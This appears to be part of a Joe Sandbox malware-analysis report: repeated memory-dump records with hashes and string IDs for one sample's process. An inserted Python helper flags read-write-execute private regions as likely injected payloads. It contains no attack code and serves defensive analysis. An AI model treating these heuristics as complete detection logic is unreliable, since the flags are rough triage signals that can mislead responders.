                                          • Opcode Fuzzy Hash: c4de428d3bf2e49efabbbc19e761c4a5f78c27c3a2ceae5d1b0cd6da6c1edd3d
                                          • Instruction Fuzzy Hash: 97318DB59093419FC709CF29C54094ABBF1FF8A714F1649AEF4889B261D331DA45CF92
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID:
                                          • API String ID: 3446177414-0
                                          • Opcode ID: 0fbc4e4e3029d3bc8b52cf6bb6c6a846005396455e94b0679e55ee7294d8b782
                                          • Instruction ID: 1344f814418db4599284e631ee5df62e3a71209cf99873d9c69ea34dc46dc825
                                          • Opcode Fuzzy Hash: 0fbc4e4e3029d3bc8b52cf6bb6c6a846005396455e94b0679e55ee7294d8b782
                                          • Instruction Fuzzy Hash: 2211C636200A119FD729CA29D840F67BBB5FFD5710F154519EF47C7AA0DA30EA02C790
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID:
                                          • API String ID: 3446177414-0
                                          • Opcode ID: ef6e0e5e2a2b3a55eae726eeec537d07ccfeb98d57a0183a4113ab3e7bd2c32b
                                          • Instruction ID: b29da14adc61aec4ce84135faec9a9342a67ac05623fd416830adbe47fbe65cb
                                          • Opcode Fuzzy Hash: ef6e0e5e2a2b3a55eae726eeec537d07ccfeb98d57a0183a4113ab3e7bd2c32b
                                          • Instruction Fuzzy Hash: 91018936111159ABCF068E94CC50ECA3F7AFB5C754F058105FE1866220C336D9B0EB81
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID: 0-3916222277
                                          • Opcode ID: 443078717b9c7044133301fba55e6442126995285401ca312e355184f74dc5fd
                                          • Instruction ID: cd015b16cec875c314e115754d66174230bd306e29f4846e6f3bb98b88780664
                                          • Opcode Fuzzy Hash: 443078717b9c7044133301fba55e6442126995285401ca312e355184f74dc5fd
                                          • Instruction Fuzzy Hash: 10917F72A01259AFEF15CFA5DD85FAE7BB8EF19750F100069F600AB1A0D775AD04CBA0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID: 0-3916222277
                                          • Opcode ID: e79ab0f681a62e32d681d1544c0c3f2db216296745acaafb1fe7888a5309e133
                                          • Instruction ID: 88f1d50b3bdb69ff37ad37130637a2bc6380d68534b21bf3dc746c46917a61b3
                                          • Opcode Fuzzy Hash: e79ab0f681a62e32d681d1544c0c3f2db216296745acaafb1fe7888a5309e133
                                          • Instruction Fuzzy Hash: D691B035900649BEDF1ADFA1DC80F9FBBB9EF49B50F220029F504A7260D7759905CB91
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: GlobalTags
                                          • API String ID: 0-1106856819
                                          • Opcode ID: 81a3b1d979581fd395f220f0ed1b001ffcf84732a29491f3f19329337a1e5410
                                          • Instruction ID: 392b071bc6a1739159ecbb5a758415d41bda53935742c877940f815a506a37e0
                                          • Opcode Fuzzy Hash: 81a3b1d979581fd395f220f0ed1b001ffcf84732a29491f3f19329337a1e5410
                                          • Instruction Fuzzy Hash: 65717DB5E0020AEFDF5CCFA8C590A9DBBB1FF59710F10812EE905A7255EB319941CBA0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: .mui
                                          • API String ID: 0-1199573805
                                          • Opcode ID: d66e61ea333d089bedca4f48bca23304a78fd9122febe639e8a8fe1c63d207db
                                          • Instruction ID: d548db415e546caf5f35c700734ab7d9f340a5ab933b80fe179adde7c8432b0f
                                          • Opcode Fuzzy Hash: d66e61ea333d089bedca4f48bca23304a78fd9122febe639e8a8fe1c63d207db
                                          • Instruction Fuzzy Hash: BD518172D0122ADFDF08DF99D940BAEBBB8EF19F50F064169E915BB250D7348901CBA0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: EXT-
                                          • API String ID: 0-1948896318
                                          • Opcode ID: 28ab5e2795c3858c69a5758c9393a8eadbbede7d7d7b46d54e35b898d4d2b6ce
                                          • Instruction ID: 542a20785f642da55178cc87a013d2c11c3ff2c853be0f3a0d18c8404109c8d3
                                          • Opcode Fuzzy Hash: 28ab5e2795c3858c69a5758c9393a8eadbbede7d7d7b46d54e35b898d4d2b6ce
                                          • Instruction Fuzzy Hash: BF418E726093429FD710CF75C980F6BBBE8AF88754F55092DF588E7180E635DA08C792
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: BinaryHash
                                          • API String ID: 0-2202222882
                                          • Opcode ID: dbb120d6a0710ae77be1227acb17aa5a2d562ee6b1cbf400451a7a44865c75f1
                                          • Instruction ID: a02b8c7ad10f699a501bdfcbbdc60c945916e796c8ed2a5b87ec5a950a9db22e
                                          • Opcode Fuzzy Hash: dbb120d6a0710ae77be1227acb17aa5a2d562ee6b1cbf400451a7a44865c75f1
                                          • Instruction Fuzzy Hash: 054162B1D0152DAEDF25CB50CC80FEE777DAB49714F0045E5AA08AB140DB709E89CFA5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: #
                                          • API String ID: 0-1885708031
                                          • Opcode ID: 27bc9049c27dbb46b430defa76a080e73c3a884e3fe3d369ea4bc052a9ef5c9b
                                          • Instruction ID: 937c4a7d2512b1db095e8bbaf82cfaa2e5c6c9991803246b58e9e1a3352b7323
                                          • Opcode Fuzzy Hash: 27bc9049c27dbb46b430defa76a080e73c3a884e3fe3d369ea4bc052a9ef5c9b
                                          • Instruction Fuzzy Hash: E031FA32A007599EFB1ACB79C850F9E7BB8DF05704F10406CE9649B292D775D906CB90
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: BinaryName
                                          • API String ID: 0-215506332
                                          • Opcode ID: 48c9f8ed1f117c60380a564cf6d8eeceb1998a9ea69569790fde2202c6a642c1
                                          • Instruction ID: 5507ac6a89724a7f2958b0b2d95e50bc281dcd6e201c9be262686478c55bc5b1
                                          • Opcode Fuzzy Hash: 48c9f8ed1f117c60380a564cf6d8eeceb1998a9ea69569790fde2202c6a642c1
                                          • Instruction Fuzzy Hash: 0A31253690151EBFEB1ACB58C845E6FBB7AEF81720F014169E914E7250D7309E05DBE1
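Every record above and below points at the same dump region: process 8, base 0x21AB0000, protection 0x40, state 0x1000, type 0x20000, "based on PE: true". The following Python is an added example for triaging such records and is not part of the Joe Sandbox report or its tooling. It decodes the .sdmp file name, groups the per-function records by the region they were lifted from, and raises the flags a responder cares about: a region that is writable and executable at once, executable memory that no module on disk backs, and PE headers sitting outside a loader-mapped image. The field order of the .sdmp name is an assumption inferred from the values on this page; the protection, state and type constants are the documented winnt.h values, and the embedded sample records are constructed from two of this page's own entries with the link labels stripped.

```python
"""Triage helper for Joe Sandbox "Memory Dump Source" records (added example, not Joe Sandbox code).
ASSUMPTION: an .sdmp name is laid out as process.phase.dumpid.base.protect.state.type.reserved;
this is inferred from the values on this page, whose 0x40/0x1000/0x20000 match winnt.h exactly."""
import re
from dataclasses import dataclass, field

PROTECT = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
           0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
           0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
STATE = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x10000: "MEM_FREE"}
MEMTYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

SDMP_RE = re.compile(
    r"^(?P<proc>[0-9a-f]{8})\.(?P<phase>[0-9a-f]{8})\.(?P<dump>\d+)\."
    r"(?P<base>[0-9a-f]{16})\.(?P<protect>[0-9a-f]{8})\.(?P<state>[0-9a-f]{8})\."
    r"(?P<memtype>[0-9a-f]{8})\.(?P<reserved>[0-9a-f]{8})\.sdmp$", re.I)
FIELD_RE = re.compile(r"^\s*•?\s*(Source File|String ID|Opcode ID):\s*(.*?)\s*$")

@dataclass
class Region:
    proc: int
    base: int
    protect: int
    state: int
    memtype: int
    based_on_pe: bool = False
    functions: list = field(default_factory=list)  # opcode IDs located in this region
    strings: set = field(default_factory=set)      # String IDs those functions reference

    def flags(self):
        """Triage flags a responder would raise for this region."""
        out = []
        executable = bool(self.protect & 0xF0)   # any PAGE_EXECUTE* protection
        writable = bool(self.protect & 0xCC)     # any *READWRITE / *WRITECOPY protection
        if executable and writable:
            out.append("RWX")
        if executable and self.memtype == 0x20000:
            out.append("EXEC_PRIVATE")           # code that no module on disk backs
        if self.based_on_pe and self.memtype != 0x1000000:
            out.append("PE_OUTSIDE_IMAGE")       # PE headers where the loader mapped none
        return out

def parse_sdmp_name(name):
    """Decode one .sdmp file name into a Region (no functions attached yet)."""
    m = SDMP_RE.match(name.strip())
    if not m:
        raise ValueError(f"not an sdmp name: {name!r}")
    g = m.groupdict()
    return Region(proc=int(g["proc"], 16), base=int(g["base"], 16),
                  protect=int(g["protect"], 16), state=int(g["state"], 16),
                  memtype=int(g["memtype"], 16))

def describe(region):
    return (f"proc {region.proc} base 0x{region.base:X} "
            f"{PROTECT.get(region.protect, hex(region.protect))} "
            f"{STATE.get(region.state, hex(region.state))} "
            f"{MEMTYPE.get(region.memtype, hex(region.memtype))}")

def parse_records(text):
    """Group per-function records by region: a 'Source File' line opens a record."""
    regions, current = {}, None
    for line in text.splitlines():
        m = FIELD_RE.match(line)
        if not m:
            continue
        key, value = m.groups()
        if key == "Source File":
            name, _, rest = value.partition(",")
            region = parse_sdmp_name(name)
            current = regions.setdefault(region.base, region)
            current.based_on_pe |= "based on PE: true" in rest
        elif current is None:
            continue
        elif key == "Opcode ID":
            current.functions.append(value)
        elif value:                                # String ID, skipping empty ones
            current.strings.add(value)
    return regions

def triage(text):
    """One summary line per region, with the flags from Region.flags()."""
    return [f"{describe(r)} pe={r.based_on_pe} functions={len(r.functions)} "
            f"strings={sorted(r.strings)} flags={r.flags()}"
            for r in parse_records(text).values()]

# Constructed sample: two records from this page, "Download File" link labels removed.
SAMPLE = """\
Memory Dump Source
• Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
• Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmp
• API ID:
• String ID: BinaryHash
• Opcode ID: dbb120d6a0710ae77be1227acb17aa5a2d562ee6b1cbf400451a7a44865c75f1
Memory Dump Source
• Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
• String ID: BinaryName
• Opcode ID: 48c9f8ed1f117c60380a564cf6d8eeceb1998a9ea69569790fde2202c6a642c1
"""
```

Calling `triage(SAMPLE)` yields a single line for the 0x21AB0000 region, described as PAGE_EXECUTE_READWRITE / MEM_COMMIT / MEM_PRIVATE with the flags RWX, EXEC_PRIVATE and PE_OUTSIDE_IMAGE: a PE living in private read-write-execute memory is what an unpacked or injected payload looks like, as opposed to a module the loader mapped as MEM_IMAGE. The "Associated" dumps at 0x21BD9000, 0x21BDD000 and 0x21C4E000 carry the same protection fields and can be fed through `parse_sdmp_name` the same way when deciding which dumps to pull for static analysis.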
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1e23ac8905b4697b660a48898d5c6bb65e2e40782138313722317f2b13000e46
                                          • Instruction ID: a114557e992492e073b8e2ffa60a8e793ad38e07b87bd0f191194133f2e0aaa6
                                          • Opcode Fuzzy Hash: 1e23ac8905b4697b660a48898d5c6bb65e2e40782138313722317f2b13000e46
                                          • Instruction Fuzzy Hash: 5842E135A083419FEB19CF65C890A6BBBF5EF89B40F06096DFA8287260D731DD45CB52
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 95312d083681417b2a41f4b218a32960fb3e7e67cea37b0d54fcb629c76f6cf7
                                          • Instruction ID: 49415da20511f3fe29fb59f5d95f68741442d92dca089866dd5ac6cca43143e5
                                          • Opcode Fuzzy Hash: 95312d083681417b2a41f4b218a32960fb3e7e67cea37b0d54fcb629c76f6cf7
                                          • Instruction Fuzzy Hash: 2D425B72A002199FEF28CF69C881BADBBF5FF49300F1581A9E958EB251D7349985CF50
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e38bfd47551cc9b80a74c41283403f5deca8a2ea705af9656bfd0d7b40916779
                                          • Instruction ID: 477ddb5607fde176e2afbfbbb7ac0d798051e51e8fb27ee5a2620316751b1faa
                                          • Opcode Fuzzy Hash: e38bfd47551cc9b80a74c41283403f5deca8a2ea705af9656bfd0d7b40916779
                                          • Instruction Fuzzy Hash: 7432DE70E007558FEB19CF79C860BAABBF2FF89700F10811EE4859B295D735A946DB90
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                          • Instruction ID: fa671ae20a84121d672449333bf5b7fdfaf4224c46427899517e34745e1a9d80
                                          • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                          • Instruction Fuzzy Hash: 39F14874E0061A9BDF19CFA5C990BAEBBF5FF49710F048169EA04AB250E774DD41CB60
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a28c6299c4cbc08a2a692f658f859f0259156e5749d40ff6d8bfd6f375e33e21
                                          • Instruction ID: 48470c0795e4d0592b7cbb2e0e35623e6fd8e9fac498f4486b925a47a0150a7e
                                          • Opcode Fuzzy Hash: a28c6299c4cbc08a2a692f658f859f0259156e5749d40ff6d8bfd6f375e33e21
                                          • Instruction Fuzzy Hash: 33D1C072A0060A9FDF09CF69C841ABEBBF5EF88304F148179D965E7241D739DA06CB60
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a10ede18d77e50cc1556980523cb1fda41f7344d979cf646f64f8d5a91452a94
                                          • Instruction ID: e7e5f4f669a84ac020ae9afbe11bbb937fe8b3f61d622746c1ac3964fdff0008
                                          • Opcode Fuzzy Hash: a10ede18d77e50cc1556980523cb1fda41f7344d979cf646f64f8d5a91452a94
                                          • Instruction Fuzzy Hash: 03D1F1B2A00A069FDB18DF64C990EAAB7B5FF94B04F05423DF915DB295EB30DA50CB50
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                          • Instruction ID: 7eed7aa1eb3c94a6e55ddb72ddb4cdfd81b1b67a7f7cce0ca6f35e570813b8b1
                                          • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                          • Instruction Fuzzy Hash: E2B15F74A00745AFDF18CB95C940EABBBBEEFA9304F50447DAA42976A4DA34E905CF10
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                          • Instruction ID: 3a2f2b761fa639eea7b1a0a59f53189b7024bcca71d9425f1af5335318454f0f
                                          • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                          • Instruction Fuzzy Hash: D2B15531A00A46AFDB19CB64C951BAEBBFBEF59300F148198E641DB391D771E941DB80
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 558c91ffd318cfa72459ade30502afeb4b634268958cb31aa5e7a89e1d856eec
                                          • Instruction ID: 9e97d8af1f8ed789ad99dcf732486c52e0b24a00f97baa65b3971829524f3cd1
                                          • Opcode Fuzzy Hash: 558c91ffd318cfa72459ade30502afeb4b634268958cb31aa5e7a89e1d856eec
                                          • Instruction Fuzzy Hash: E8C158745083418FD764CF25C494BAAB7F4FF98304F44896DE98997291DB74EA08CFA2
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 85a0557281f93599ea63baf7e3ce4d19396c7ec9106a0c32e2ca4c9e83a93259
                                          • Instruction ID: 99f66aad88683baee6aadad89f688755301347be5f7e6a297627ca93a3dc8202
                                          • Opcode Fuzzy Hash: 85a0557281f93599ea63baf7e3ce4d19396c7ec9106a0c32e2ca4c9e83a93259
                                          • Instruction Fuzzy Hash: B9B19171A0066A8FDB25CF24C890BA9B7B5EF49700F5085EDD50AE7295EB309E85CF21
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 629f3409d912e254b7ebe21aeaefd64a40793bfa18f111fa76876c483c29a84f
                                          • Instruction ID: abae8eff2ac6de11c8427ff1d30637e0eb4f4ea659521848c1c2a3b5d19fa9c0
                                          • Opcode Fuzzy Hash: 629f3409d912e254b7ebe21aeaefd64a40793bfa18f111fa76876c483c29a84f
                                          • Instruction Fuzzy Hash: 1BA13370B00A1AEFDB1CCF65C890BAAB7B5FF59314F004129EA18D7295DB34E919CB90
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmp
